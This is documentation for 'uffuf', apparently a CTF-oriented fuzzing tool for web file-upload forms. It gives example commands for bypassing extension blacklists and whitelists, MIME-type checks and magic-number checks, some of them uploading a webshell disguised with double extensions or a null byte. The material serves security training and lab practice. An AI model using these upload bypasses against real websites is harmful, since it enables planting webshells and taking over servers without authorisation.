uffuf is a specialized tool inspired by the popular fuzzer ffuf. It allows users to fuzz file names, content types, and other parameters, to assist in identifying vulnerabilities related to unrestricted file uploads in web applications. It's an alternative to Burp Suite or other web proxies.
- Filename Fuzzing — Bypassing Filename Checks
$ onectf uffuf -u https://example.com -p uploadFile -F myFile -w myWordlist -Fn dummyFUZZ
$ # Attempt by prepending a valid extension (filter)
$ onectf uffuf -u https://example.com -p uploadFile -F myFile -w myWordlist -Fn dummy.jpgFUZZ
$ # Attempt by appending a valid extension (misconfiguration, rare)
$ onectf uffuf -u https://example.com -p uploadFile -F myFile -w myWordlist -Fn dummyFUZZ.jpg
- MIME type — Investigate the filter
$ # Attempt MIME type bypass
$ onectf uffuf [...] -Ft image/jpeg
$ # Attempt magic number bypass
$ onectf uffuf [...] -Ft image/jpeg --spoof
- MIME type Fuzzing — Detect Allowed MIME types
$ # --spoof is optional if the server don't check the magic number
$ onectf uffuf -u https://example.com -p uploadFile -F myFile -w myWordlist -Ft FUZZ --spoof
- Blacklist some extensions (
https://academy.hackthebox.com/module/136/section/1288
)
$ onectf uffuf -u <IP:port>/upload.php -p uploadFile -w web-extensions.txt -Fn testFUZZ -mr "File successfully uploaded"
- Blacklist and whitelist extensions (
https://academy.hackthebox.com/module/136/section/1289
)
$ onectf uffuf -u <IP:port>/upload.php -p uploadFile -w web-extensions.txt -Fn testFUZZ.jpg -mr "File successfully uploaded"
- Blacklist and whitelist extensions, MIME type and magic number checking (
https://academy.hackthebox.com/module/136/section/1290
)
$ file webshell.php.jpg
webshell.php.jpg: JPEG image data
$ onectf uffuf -u <IP:port>/upload.php -p uploadFile -w web-extensions.txt -F webshell.php.jpg -Fn test.jpgFUZZ -Ft image/jpg -mr "File successfully uploaded"
Alternatively, we can use the --spoof
flag:
$ onectf uffuf -u <IP:port>/upload.php -p uploadFile -w web-extensions.txt -F webshell.php -Fn test.jpgFUZZ -Ft image/jpg -mr "File successfully uploaded" --spoof
- Add an initial dummy test
- Improve Verbose Mode
- Add option to test if uploaded file is executable?
- Root-me notes
$ onectf uffuf -u URL -p file -F webshell.php -Fn dummyFUZZ -v -W .php.png
$ onectf uffuf -u URL -p file -F webshell.php -Fn dummyFUZZ -v -W .php -Ft 'image/jpeg' -H 'Cookie: PHPSESSID=xxx'
$ onectf uffuf -u URL -p file -F webshell.php -Fn dummyFUZZ -v -W '.php%00.jpg' -Ft 'image/jpeg'
$ onectf uffuf -u URL -p file -F webshell.zip -Fn dummyFUZZ -v -W .zip
$ onectf uffuf -u URL -d 'xxx=yyy' -p file -F webshell.zip -Fn dummyFUZZ -v -W .jpg
$ onectf uffuf -u URL -p 'file[]' -F webshell.jpg -Fn dummyFUZZ -v -W x.jpg